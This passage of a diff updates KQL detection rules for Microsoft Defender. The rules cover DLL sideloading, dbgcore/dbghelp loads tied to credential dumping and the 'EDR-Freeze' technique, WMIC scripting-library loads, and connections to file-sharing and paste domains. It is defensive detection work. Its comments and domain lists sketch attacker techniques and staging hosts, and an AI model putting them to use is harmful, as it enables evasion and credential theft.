FolderPath endswith "\\iernonce.dll" or FolderPath endswith "\\iertutil.dll" or FolderPath endswith "\\ifmon.dll" or FolderPath endswith "\\ifsutil.dll" or FolderPath endswith "\\inproclogger.dll" or FolderPath endswith "\\iphlpapi.dll" or FolderPath endswith "\\iri.dll" or FolderPath endswith "\\iscsidsc.dll" or FolderPath endswith "\\iscsium.dll" or FolderPath endswith "\\isv.exe_rsaenh.dll" or FolderPath endswith "\\iumbase.dll" or FolderPath endswith "\\iumsdk.dll" or FolderPath endswith "\\joinutil.dll" or FolderPath endswith "\\kdstub.dll" or FolderPath endswith "\\ksuser.dll" or FolderPath endswith "\\ktmw32.dll" or FolderPath endswith "\\licensemanagerapi.dll" or FolderPath endswith "\\licensingdiagspp.dll" or FolderPath endswith "\\linkinfo.dll" or FolderPath endswith "\\loadperf.dll" or FolderPath endswith "\\lockhostingframework.dll" or FolderPath endswith "\\logoncli.dll" or FolderPath endswith "\\logoncontroller.dll" or FolderPath endswith "\\lpksetupproxyserv.dll" or FolderPath endswith "\\lrwizdll.dll" or FolderPath endswith "\\magnification.dll" or FolderPath endswith "\\maintenanceui.dll" or FolderPath endswith "\\mapistub.dll" or FolderPath endswith "\\mbaexmlparser.dll" or FolderPath endswith "\\mdmdiagnostics.dll" or FolderPath endswith "\\mfc42u.dll" or FolderPath endswith "\\mfcore.dll" or FolderPath endswith "\\mfplat.dll" or FolderPath endswith "\\mi.dll" or FolderPath endswith "\\midimap.dll" or FolderPath endswith "\\mintdh.dll" or FolderPath endswith "\\miutils.dll" or FolderPath endswith "\\mlang.dll" or FolderPath endswith "\\mmdevapi.dll" or FolderPath endswith "\\mobilenetworking.dll" or FolderPath endswith "\\mpr.dll" or FolderPath endswith "\\mprapi.dll" or FolderPath endswith "\\mrmcorer.dll" or FolderPath endswith "\\msacm32.dll" or FolderPath endswith "\\mscms.dll" or FolderPath endswith "\\mscoree.dll" or FolderPath endswith "\\msctf.dll" or FolderPath endswith "\\msctfmonitor.dll" or FolderPath endswith "\\msdrm.dll" or FolderPath endswith "\\msdtctm.dll" or FolderPath endswith "\\msftedit.dll" or FolderPath endswith "\\msi.dll" or FolderPath endswith "\\msiso.dll" or FolderPath endswith "\\msutb.dll" or FolderPath endswith "\\msvcp110_win.dll" or FolderPath endswith "\\mswb7.dll" or FolderPath endswith "\\mswsock.dll" or FolderPath endswith "\\msxml3.dll" or FolderPath endswith "\\mtxclu.dll" or FolderPath endswith "\\napinsp.dll" or FolderPath endswith "\\ncrypt.dll" or FolderPath endswith "\\ndfapi.dll" or FolderPath endswith "\\netapi32.dll" or FolderPath endswith "\\netid.dll" or FolderPath endswith "\\netiohlp.dll" or FolderPath endswith "\\netjoin.dll" or FolderPath endswith "\\netplwiz.dll" or FolderPath endswith "\\netprofm.dll" or FolderPath endswith "\\netprovfw.dll" or FolderPath endswith "\\netsetupapi.dll" or FolderPath endswith "\\netshell.dll" or FolderPath endswith "\\nettrace.dll" or FolderPath endswith "\\netutils.dll" or FolderPath endswith "\\networkexplorer.dll" or FolderPath endswith "\\newdev.dll" or FolderPath endswith "\\ninput.dll" or FolderPath endswith "\\nlaapi.dll" or FolderPath endswith "\\nlansp_c.dll" or FolderPath endswith "\\npmproxy.dll" or FolderPath endswith "\\nshhttp.dll" or FolderPath endswith "\\nshipsec.dll" or FolderPath endswith "\\nshwfp.dll" or FolderPath endswith "\\ntdsapi.dll" or FolderPath endswith "\\ntlanman.dll" or FolderPath endswith "\\ntlmshared.dll" or FolderPath endswith "\\ntmarta.dll" or FolderPath endswith "\\ntshrui.dll" or FolderPath endswith "\\oleacc.dll" or FolderPath endswith "\\omadmapi.dll" or FolderPath endswith "\\onex.dll" or FolderPath endswith "\\opcservices.dll" or FolderPath endswith "\\osbaseln.dll" or FolderPath endswith "\\osksupport.dll" or FolderPath endswith "\\osuninst.dll" or FolderPath endswith "\\p2p.dll" or FolderPath endswith "\\p2pnetsh.dll" or FolderPath endswith "\\p9np.dll" or FolderPath endswith "\\pcaui.dll" or FolderPath endswith "\\pdh.dll" or FolderPath endswith "\\peerdistsh.dll" or FolderPath endswith "\\pkeyhelper.dll" or FolderPath endswith "\\pla.dll" or FolderPath endswith "\\playsndsrv.dll" or FolderPath endswith "\\pnrpnsp.dll" or FolderPath endswith "\\policymanager.dll" or FolderPath endswith "\\polstore.dll" or FolderPath endswith "\\powrprof.dll" or FolderPath endswith "\\printui.dll" or FolderPath endswith "\\prntvpt.dll" or FolderPath endswith "\\profapi.dll" or FolderPath endswith "\\propsys.dll" or FolderPath endswith "\\proximitycommon.dll" or FolderPath endswith "\\proximityservicepal.dll" or FolderPath endswith "\\prvdmofcomp.dll" or FolderPath endswith "\\puiapi.dll" or FolderPath endswith "\\radcui.dll" or FolderPath endswith "\\rasapi32.dll" or FolderPath endswith "\\rasdlg.dll" or FolderPath endswith "\\rasgcw.dll" or FolderPath endswith "\\rasman.dll" or FolderPath endswith "\\rasmontr.dll" or FolderPath endswith "\\reagent.dll" or FolderPath endswith "\\regapi.dll" or FolderPath endswith "\\reseteng.dll" or FolderPath endswith "\\resetengine.dll" or FolderPath endswith "\\resutils.dll" or FolderPath endswith "\\rmclient.dll" or FolderPath endswith "\\rpcnsh.dll" or FolderPath endswith "\\rsaenh.dll" or FolderPath endswith "\\rtutils.dll" or FolderPath endswith "\\rtworkq.dll" or FolderPath endswith "\\samcli.dll" or FolderPath endswith "\\samlib.dll" or FolderPath endswith "\\sapi_onecore.dll" or FolderPath endswith "\\sas.dll" or FolderPath endswith "\\scansetting.dll" or FolderPath endswith "\\scecli.dll" or FolderPath endswith "\\schedcli.dll" or FolderPath endswith "\\secur32.dll" or FolderPath endswith "\\security.dll" or FolderPath endswith "\\sensapi.dll" or FolderPath endswith "\\shell32.dll" or FolderPath endswith "\\shfolder.dll" or FolderPath endswith "\\slc.dll" or FolderPath endswith "\\snmpapi.dll" or FolderPath endswith "\\spectrumsyncclient.dll" or FolderPath endswith "\\spp.dll" or FolderPath endswith "\\sppc.dll" or FolderPath endswith "\\sppcext.dll" or FolderPath endswith "\\srclient.dll" or FolderPath endswith "\\srcore.dll" or FolderPath endswith "\\srmtrace.dll" or FolderPath endswith "\\srpapi.dll" or FolderPath endswith "\\srvcli.dll" or FolderPath endswith "\\ssp_isv.exe_rsaenh.dll" or FolderPath endswith "\\ssp.exe_rsaenh.dll" or FolderPath endswith "\\sspicli.dll" or FolderPath endswith "\\ssshim.dll" or FolderPath endswith "\\staterepository.core.dll" or FolderPath endswith "\\structuredquery.dll" or FolderPath endswith "\\sxshared.dll" or FolderPath endswith "\\systemsettingsthresholdadminflowui.dll" or FolderPath endswith "\\tapi32.dll" or FolderPath endswith "\\tbs.dll" or FolderPath endswith "\\tdh.dll" or FolderPath endswith "\\textshaping.dll" or FolderPath endswith "\\timesync.dll" or FolderPath endswith "\\tpmcoreprovisioning.dll" or FolderPath endswith "\\tquery.dll" or FolderPath endswith "\\tsworkspace.dll" or FolderPath endswith "\\ttdrecord.dll" or FolderPath endswith "\\twext.dll" or FolderPath endswith "\\twinapi.dll" or FolderPath endswith "\\twinui.appcore.dll" or FolderPath endswith "\\uianimation.dll" or FolderPath endswith "\\uiautomationcore.dll" or FolderPath endswith "\\uireng.dll" or FolderPath endswith "\\uiribbon.dll" or FolderPath endswith "\\umpdc.dll" or FolderPath endswith "\\unattend.dll" or FolderPath endswith "\\updatepolicy.dll" or FolderPath endswith "\\upshared.dll" or FolderPath endswith "\\urlmon.dll" or FolderPath endswith "\\userenv.dll" or FolderPath endswith "\\utildll.dll" or FolderPath endswith "\\uxinit.dll" or FolderPath endswith "\\uxtheme.dll" or FolderPath endswith "\\vaultcli.dll" or FolderPath endswith "\\vdsutil.dll" or FolderPath endswith "\\version.dll" or FolderPath endswith "\\virtdisk.dll" or FolderPath endswith "\\vssapi.dll" or FolderPath endswith "\\vsstrace.dll" or FolderPath endswith "\\wbemprox.dll" or FolderPath endswith "\\wbemsvc.dll" or FolderPath endswith "\\wcmapi.dll" or FolderPath endswith "\\wcnnetsh.dll" or FolderPath endswith "\\wdi.dll" or FolderPath endswith "\\wdscore.dll" or FolderPath endswith "\\webservices.dll" or FolderPath endswith "\\wecapi.dll" or FolderPath endswith "\\wer.dll" or FolderPath endswith "\\wevtapi.dll" or FolderPath endswith "\\whhelper.dll" or FolderPath endswith "\\wimgapi.dll" or FolderPath endswith "\\winbio.dll" or FolderPath endswith "\\winbrand.dll" or FolderPath endswith "\\windows.storage.dll" or FolderPath endswith "\\windows.storage.search.dll" or FolderPath endswith "\\windows.ui.immersive.dll" or FolderPath endswith "\\windowscodecs.dll" or FolderPath endswith "\\windowscodecsext.dll" or FolderPath endswith "\\windowsudk.shellcommon.dll" or FolderPath endswith "\\winhttp.dll" or FolderPath endswith "\\wininet.dll" or FolderPath endswith "\\winipsec.dll" or FolderPath endswith "\\winmde.dll" or FolderPath endswith "\\winmm.dll" or FolderPath endswith "\\winnsi.dll" or FolderPath endswith "\\winrnr.dll" or FolderPath endswith "\\winscard.dll" or FolderPath endswith "\\winsqlite3.dll" or FolderPath endswith "\\winsta.dll" or FolderPath endswith "\\winsync.dll" or FolderPath endswith "\\wkscli.dll" or FolderPath endswith "\\wlanapi.dll" or FolderPath endswith "\\wlancfg.dll" or FolderPath endswith "\\wldp.dll" or FolderPath endswith "\\wlidprov.dll" or FolderPath endswith "\\wmiclnt.dll" or FolderPath endswith "\\wmidcom.dll" or FolderPath endswith "\\wmiutils.dll" or FolderPath endswith "\\wmpdui.dll" or FolderPath endswith "\\wmsgapi.dll" or FolderPath endswith "\\wofutil.dll" or FolderPath endswith "\\wpdshext.dll" or FolderPath endswith "\\wscapi.dll" or FolderPath endswith "\\wsdapi.dll" or FolderPath endswith "\\wshbth.dll" or FolderPath endswith "\\wshelper.dll" or FolderPath endswith "\\wsmsvc.dll" or FolderPath endswith "\\wtsapi32.dll" or FolderPath endswith "\\wwancfg.dll" or FolderPath endswith "\\wwapi.dll" or FolderPath endswith "\\xmllite.dll" or FolderPath endswith "\\xolehlp.dll" or FolderPath endswith "\\xpsservices.dll" or FolderPath endswith "\\xwizards.dll" or FolderPath endswith "\\xwtpw32.dll" or FolderPath endswith "\\amsi.dll" or FolderPath endswith "\\appraiser.dll" or FolderPath endswith "\\COMRES.DLL" or FolderPath endswith "\\cryptnet.dll" or FolderPath endswith "\\DispBroker.dll" or FolderPath endswith "\\dsound.dll" or FolderPath endswith "\\dxilconv.dll" or FolderPath endswith "\\FxsCompose.dll" or FolderPath endswith "\\FXSRESM.DLL" or FolderPath endswith "\\msdtcVSp1res.dll" or FolderPath endswith "\\PrintIsolationProxy.dll" or FolderPath endswith "\\rdpendp.dll" or FolderPath endswith "\\rpchttp.dll" or FolderPath endswith "\\storageusage.dll" or FolderPath endswith "\\utcutil.dll" or FolderPath endswith "\\WfsR.dll" or FolderPath endswith "\\igd10iumd64.dll" or FolderPath endswith "\\igd12umd64.dll" or FolderPath endswith "\\igdumdim64.dll" or FolderPath endswith "\\igdusc64.dll" or FolderPath endswith "\\TSMSISrv.dll" or FolderPath endswith "\\TSVIPSrv.dll" or FolderPath endswith "\\wbemcomn.dll" or FolderPath endswith "\\WLBSCTRL.dll" or FolderPath endswith "\\wow64log.dll" or FolderPath endswith "\\WptsExtensions.dll") and (not(((FolderPath endswith "\\version.dll" and FolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\") or (FolderPath endswith "\\d3dx9_43.dll" and FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.DirectXRuntime_") or (FolderPath endswith "\\cscui.dll" and FolderPath startswith "C:\\Windows\\Microsoft.NET\\") or (FolderPath contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SystemTemp\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\" or FolderPath contains "C:\\Windows\\SyChpe32\\") or (FolderPath startswith "C:\\Windows\\Temp\\" and (InitiatingProcessFolderPath endswith "\\TiWorker.exe" or InitiatingProcessFolderPath endswith "\\wuaucltcore.exe") and (InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\arm64" or InitiatingProcessFolderPath startswith "C:\\Windows\\UUS\\arm64\\"))))) and (not((((FolderPath endswith "\\mi.dll" or FolderPath endswith "\\miutils.dl") and FolderPath startswith "C:\\Program Files\\Arsenal-Image-Mounter-") or FolderPath startswith "C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or (FolderPath endswith "\\PolicyManager.dll" and (FolderPath startswith "C:\\Program Files\\CheckPoint\\" or FolderPath startswith "C:\\Program Files (x86)\\CheckPoint\\") and InitiatingProcessFolderPath endswith "\\SmartConsole.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CheckPoint\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CheckPoint\\")) or (FolderPath startswith "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" and (InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" or InitiatingProcessFolderPath contains "C:\\Windows\\System32\\backgroundTaskHost.exe")) or (InitiatingProcessFolderPath endswith "\\wldp.dll" and InitiatingProcessFolderPath startswith "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs") or (FolderPath endswith "\\mswb7.dll" and FolderPath startswith "C:\\Program Files\\Microsoft\\Exchange Server\\") or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe" and FolderPath =~ "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll")))) \ No newline at end of file diff --git a/KQL/rules/windows/image_load/potentially_suspicious_volume_shadow_copy_vsstrace_dll_load.kql b/KQL/rules/windows/image_load/potentially_suspicious_volume_shadow_copy_vsstrace_dll_load.kql index dd9a9245..8b175607 100644 --- a/KQL/rules/windows/image_load/potentially_suspicious_volume_shadow_copy_vsstrace_dll_load.kql +++ b/KQL/rules/windows/image_load/potentially_suspicious_volume_shadow_copy_vsstrace_dll_load.kql @@ -7,4 +7,4 @@ // Tags: attack.defense-evasion, attack.impact, attack.t1490 DeviceImageLoadEvents -| where FolderPath endswith "\\vsstrace.dll" and (not((isnull(InitiatingProcessFolderPath) or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or ((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe")) or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\{" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\" or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Package Cache\\{"))))) and (not((InitiatingProcessFolderPath contains "\\temp\\is-" and InitiatingProcessFolderPath contains "\\avira_system_speedup.tmp"))) \ No newline at end of file +| where FolderPath endswith "\\vsstrace.dll" and (not((isnull(InitiatingProcessFolderPath) or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or ((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe")) or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\{" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\" or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Package Cache\\{"))))) and (not(((InitiatingProcessFolderPath contains "\\temp\\is-" and InitiatingProcessFolderPath contains "\\avira_system_speedup.tmp") or InitiatingProcessFolderPath startswith "C:\\$WinREAgent\\Scratch\\"))) \ No newline at end of file diff --git a/KQL/rules/windows/image_load/suspicious_loading_of_dbgcore_dbghelp_dlls_from_uncommon_location.kql b/KQL/rules/windows/image_load/suspicious_loading_of_dbgcore_dbghelp_dlls_from_uncommon_location.kql new file mode 100644 index 00000000..598ad00e --- /dev/null +++ b/KQL/rules/windows/image_load/suspicious_loading_of_dbgcore_dbghelp_dlls_from_uncommon_location.kql @@ -0,0 +1,13 @@ +// Title: Suspicious Loading of Dbgcore/Dbghelp DLLs from Uncommon Location +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-11-27 +// Level: high +// Description: Detects loading of dbgcore.dll or dbghelp.dll from uncommon locations such as user directories. +// These DLLs contain the MiniDumpWriteDump function, which can be abused for credential dumping purposes or in some cases for evading EDR/AV detection by suspending processes. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003, attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Possibly during software installation or update processes + +DeviceImageLoadEvents +| where (FolderPath endswith "\\dbgcore.dll" or FolderPath endswith "\\dbghelp.dll") and (InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Temp\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\$Recycle.Bin\\" or InitiatingProcessFolderPath contains "\\Contacts\\" or InitiatingProcessFolderPath contains "\\Desktop\\" or InitiatingProcessFolderPath contains "\\Documents\\" or InitiatingProcessFolderPath contains "\\Downloads\\" or InitiatingProcessFolderPath contains "\\Favorites\\" or InitiatingProcessFolderPath contains "\\Favourites\\" or InitiatingProcessFolderPath contains "\\inetpub\\wwwroot\\" or InitiatingProcessFolderPath contains "\\Music\\" or InitiatingProcessFolderPath contains "\\Pictures\\" or InitiatingProcessFolderPath contains "\\Start Menu\\Programs\\Startup\\" or InitiatingProcessFolderPath contains "\\Users\\Default\\" or InitiatingProcessFolderPath contains "\\Videos\\") \ No newline at end of file diff --git a/KQL/rules/windows/image_load/werfaultsecure_loading_dbgcore_or_dbghelp_edr_freeze.kql b/KQL/rules/windows/image_load/werfaultsecure_loading_dbgcore_or_dbghelp_edr_freeze.kql new file mode 100644 index 00000000..1ed73a09 --- /dev/null +++ b/KQL/rules/windows/image_load/werfaultsecure_loading_dbgcore_or_dbghelp_edr_freeze.kql @@ -0,0 +1,13 @@ +// Title: WerFaultSecure Loading DbgCore or DbgHelp - EDR-Freeze +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-11-27 +// Level: medium +// Description: Detects WerFaultSecure.exe loading dbgcore.dll or dbghelp.dll which contains the MiniDumpWriteDump function. +// The MiniDumpWriteDump function creates a minidump of a process by suspending all threads in the target process to ensure a consistent memory snapshot. +// The EDR-Freeze technique abuses WerFaultSecure.exe running as a Protected Process Light (PPL) with WinTCB protection level to suspend EDR/AV processes. +// By leveraging MiniDumpWriteDump's thread suspension behavior, edr-freeze allows malicious activity to execute undetected during the suspension period. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceImageLoadEvents +| where (FolderPath endswith "\\dbgcore.dll" or FolderPath endswith "\\dbghelp.dll") and InitiatingProcessFolderPath endswith "\\WerFaultSecure.exe" \ No newline at end of file diff --git a/KQL/rules/windows/image_load/wmic_loading_scripting_libraries.kql b/KQL/rules/windows/image_load/wmic_loading_scripting_libraries.kql index 56bf5a65..07306e40 100644 --- a/KQL/rules/windows/image_load/wmic_loading_scripting_libraries.kql +++ b/KQL/rules/windows/image_load/wmic_loading_scripting_libraries.kql @@ -6,9 +6,10 @@ // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1220 // False Positives: -// - The command wmic os get lastboottuptime loads vbscript.dll +// - The command wmic os get lastbootuptime loads vbscript.dll // - The command wmic os get locale loads vbscript.dll // - Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights +// - The command `wmic ntevent` loads vbscript.dll DeviceImageLoadEvents | where (FolderPath endswith "\\jscript.dll" or FolderPath endswith "\\vbscript.dll") and InitiatingProcessFolderPath endswith "\\wmic.exe" \ No newline at end of file diff --git a/KQL/rules/windows/network_connection/network_communication_initiated_to_file_sharing_domains_from_process_located_in_suspicious_folder.kql b/KQL/rules/windows/network_connection/network_communication_initiated_to_file_sharing_domains_from_process_located_in_suspicious_folder.kql index bdc3d740..788867e1 100644 --- a/KQL/rules/windows/network_connection/network_communication_initiated_to_file_sharing_domains_from_process_located_in_suspicious_folder.kql +++ b/KQL/rules/windows/network_connection/network_communication_initiated_to_file_sharing_domains_from_process_located_in_suspicious_folder.kql @@ -9,4 +9,4 @@ // - Some installers located in the temp directory might communicate with the Github domains in order to download additional software. Baseline these cases or move the github domain to a lower level hunting rule. DeviceNetworkEvents -| where (RemoteUrl endswith ".githubusercontent.com" or RemoteUrl endswith "anonfiles.com" or RemoteUrl endswith "cdn.discordapp.com" or RemoteUrl endswith "ddns.net" or RemoteUrl endswith "dl.dropboxusercontent.com" or RemoteUrl endswith "ghostbin.co" or RemoteUrl endswith "glitch.me" or RemoteUrl endswith "gofile.io" or RemoteUrl endswith "hastebin.com" or RemoteUrl endswith "mediafire.com" or RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz" or RemoteUrl endswith "onrender.com" or RemoteUrl endswith "pages.dev" or RemoteUrl endswith "paste.ee" or RemoteUrl endswith "pastebin.com" or RemoteUrl endswith "pastebin.pl" or RemoteUrl endswith "pastetext.net" or RemoteUrl endswith "pixeldrain.com" or RemoteUrl endswith "privatlab.com" or RemoteUrl endswith "privatlab.net" or RemoteUrl endswith "send.exploit.in" or RemoteUrl endswith "sendspace.com" or RemoteUrl endswith "storage.googleapis.com" or RemoteUrl endswith "storjshare.io" or RemoteUrl endswith "supabase.co" or RemoteUrl endswith "temp.sh" or RemoteUrl endswith "transfer.sh" or RemoteUrl endswith "trycloudflare.com" or RemoteUrl endswith "ufile.io" or RemoteUrl endswith "w3spaces.com" or RemoteUrl endswith "workers.dev") and (InitiatingProcessFolderPath contains ":\\$Recycle.bin" or InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Temp\\" or InitiatingProcessFolderPath contains ":\\Users\\Default\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains ":\\Windows\\Fonts\\" or InitiatingProcessFolderPath contains ":\\Windows\\IME\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\Tasks\\" or InitiatingProcessFolderPath contains ":\\Windows\\Tasks\\" or InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or InitiatingProcessFolderPath contains "\\AppData\\Temp\\" or InitiatingProcessFolderPath contains "\\config\\systemprofile\\" or InitiatingProcessFolderPath contains "\\Windows\\addins\\") \ No newline at end of file +| where (RemoteUrl endswith ".githubusercontent.com" or RemoteUrl endswith "anonfiles.com" or RemoteUrl endswith "cdn.discordapp.com" or RemoteUrl endswith "ddns.net" or RemoteUrl endswith "dl.dropboxusercontent.com" or RemoteUrl endswith "ghostbin.co" or RemoteUrl endswith "github.com" or RemoteUrl endswith "glitch.me" or RemoteUrl endswith "gofile.io" or RemoteUrl endswith "hastebin.com" or RemoteUrl endswith "mediafire.com" or RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz" or RemoteUrl endswith "onrender.com" or RemoteUrl endswith "pages.dev" or RemoteUrl endswith "paste.ee" or RemoteUrl endswith "pastebin.com" or RemoteUrl endswith "pastebin.pl" or RemoteUrl endswith "pastetext.net" or RemoteUrl endswith "pixeldrain.com" or RemoteUrl endswith "privatlab.com" or RemoteUrl endswith "privatlab.net" or RemoteUrl endswith "send.exploit.in" or RemoteUrl endswith "sendspace.com" or RemoteUrl endswith "storage.googleapis.com" or RemoteUrl endswith "storjshare.io" or RemoteUrl endswith "supabase.co" or RemoteUrl endswith "temp.sh" or RemoteUrl endswith "transfer.sh" or RemoteUrl endswith "trycloudflare.com" or RemoteUrl endswith "ufile.io" or RemoteUrl endswith "w3spaces.com" or RemoteUrl endswith "workers.dev") and (InitiatingProcessFolderPath contains ":\\$Recycle.bin" or InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Temp\\" or InitiatingProcessFolderPath contains ":\\Users\\Default\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains ":\\Windows\\Fonts\\" or InitiatingProcessFolderPath contains ":\\Windows\\IME\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\Tasks\\" or InitiatingProcessFolderPath contains ":\\Windows\\Tasks\\" or InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or InitiatingProcessFolderPath contains "\\AppData\\Temp\\" or InitiatingProcessFolderPath contains "\\config\\systemprofile\\" or InitiatingProcessFolderPath contains "\\Windows\\addins\\") \ No newline at end of file diff --git a/KQL/rules/windows/network_connection/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql b/KQL/rules/windows/network_connection/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql index b45c7855..4594e5e1 100644 --- a/KQL/rules/windows/network_connection/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql +++ b/KQL/rules/windows/network_connection/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql @@ -7,4 +7,4 @@ // Tags: attack.command-and-control, attack.t1105 DeviceNetworkEvents -| where (InitiatingProcessFolderPath contains ":\\$Recycle.bin" or InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Temp\\" or InitiatingProcessFolderPath contains ":\\Users\\Default\\" or InitiatingProcessFolderPath contains ":\\Windows\\Fonts\\" or InitiatingProcessFolderPath contains ":\\Windows\\IME\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\Tasks\\" or InitiatingProcessFolderPath contains ":\\Windows\\Tasks\\" or InitiatingProcessFolderPath contains "\\config\\systemprofile\\" or InitiatingProcessFolderPath contains "\\Windows\\addins\\") and (not((RemoteUrl endswith ".githubusercontent.com" or RemoteUrl endswith "anonfiles.com" or RemoteUrl endswith "cdn.discordapp.com" or RemoteUrl endswith "ddns.net" or RemoteUrl endswith "dl.dropboxusercontent.com" or RemoteUrl endswith "ghostbin.co" or RemoteUrl endswith "glitch.me" or RemoteUrl endswith "gofile.io" or RemoteUrl endswith "hastebin.com" or RemoteUrl endswith "mediafire.com" or RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz" or RemoteUrl endswith "onrender.com" or RemoteUrl endswith "pages.dev" or RemoteUrl endswith "paste.ee" or RemoteUrl endswith "pastebin.com" or RemoteUrl endswith "pastebin.pl" or RemoteUrl endswith "pastetext.net" or RemoteUrl endswith "portmap.io" or RemoteUrl endswith "privatlab.com" or RemoteUrl endswith "privatlab.net" or RemoteUrl endswith "send.exploit.in" or RemoteUrl endswith "sendspace.com" or RemoteUrl endswith "storage.googleapis.com" or RemoteUrl endswith "storjshare.io" or RemoteUrl endswith "supabase.co" or RemoteUrl endswith "temp.sh" or RemoteUrl endswith "transfer.sh" or RemoteUrl endswith "trycloudflare.com" or RemoteUrl endswith "ufile.io" or RemoteUrl endswith "w3spaces.com" or RemoteUrl endswith "workers.dev"))) \ No newline at end of file +| where (InitiatingProcessFolderPath contains ":\\$Recycle.bin" or InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Temp\\" or InitiatingProcessFolderPath contains ":\\Users\\Default\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains ":\\Windows\\Fonts\\" or InitiatingProcessFolderPath contains ":\\Windows\\IME\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\Tasks\\" or InitiatingProcessFolderPath contains ":\\Windows\\Tasks\\" or InitiatingProcessFolderPath contains "\\config\\systemprofile\\" or InitiatingProcessFolderPath contains "\\Contacts\\" or InitiatingProcessFolderPath contains "\\Favorites\\" or InitiatingProcessFolderPath contains "\\Favourites\\" or InitiatingProcessFolderPath contains "\\Music\\" or InitiatingProcessFolderPath contains "\\Pictures\\" or InitiatingProcessFolderPath contains "\\Videos\\" or InitiatingProcessFolderPath contains "\\Windows\\addins\\") and (not((RemoteUrl endswith ".githubusercontent.com" or RemoteUrl endswith "anonfiles.com" or RemoteUrl endswith "cdn.discordapp.com" or RemoteUrl endswith "ddns.net" or RemoteUrl endswith "dl.dropboxusercontent.com" or RemoteUrl endswith "ghostbin.co" or RemoteUrl endswith "github.com" or RemoteUrl endswith "glitch.me" or RemoteUrl endswith "gofile.io" or RemoteUrl endswith "hastebin.com" or RemoteUrl endswith "mediafire.com" or RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz" or RemoteUrl endswith "onrender.com" or RemoteUrl endswith "pages.dev" or RemoteUrl endswith "paste.ee" or RemoteUrl endswith "pastebin.com" or RemoteUrl endswith "pastebin.pl" or RemoteUrl endswith "pastetext.net" or RemoteUrl endswith "portmap.io" or RemoteUrl endswith "privatlab.com" or RemoteUrl endswith "privatlab.net" or RemoteUrl endswith "send.exploit.in" or RemoteUrl endswith "sendspace.com" or RemoteUrl endswith "storage.googleapis.com" or RemoteUrl endswith "storjshare.io" or RemoteUrl endswith "supabase.co" or RemoteUrl endswith "temp.sh" or RemoteUrl endswith "transfer.sh" or RemoteUrl endswith "trycloudflare.com" or RemoteUrl endswith "ufile.io" or 